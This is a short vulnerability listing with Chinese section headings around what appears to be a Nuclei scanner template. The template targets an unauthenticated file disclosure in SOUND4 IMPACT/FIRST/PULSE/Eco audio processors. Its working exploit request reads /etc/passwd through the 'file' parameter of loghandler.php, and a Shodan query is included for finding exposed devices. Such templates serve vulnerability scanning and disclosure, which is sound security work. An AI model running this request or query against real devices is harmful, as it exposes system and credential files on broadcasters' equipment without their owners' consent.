漏洞描述
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
sound4-file-disclosure: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
PoC代码[已公开]
id: sound4-file-disclosure
info:
name: SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File Disclosure
author: arafatansari
severity: medium
description: |
The application suffers from an unauthenticated file disclosure vulnerability. Using the 'file' GET parameter attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
- https://packetstormsecurity.com/files/170263/SOUND4-IMPACT-FIRST-PULSE-Eco-2.x-Unauthenticated-File-Disclosure.html
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php
metadata:
verified: true
max-request: 1
shodan-query: http.html:"SOUND4"
tags: packetstorm,lfi,sound4,unauth,disclosure,vuln
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a004730450220199bd58e40a096a70c1d98d1bfd6b16ba14a163bbe821b7eaf42063f7447af4d022100f5c6e533ee44d3f8e5923803091dceccd2c5275ec191272fe9cdeffe51fa18a8:922c64590222798bb761d5b6d8e72950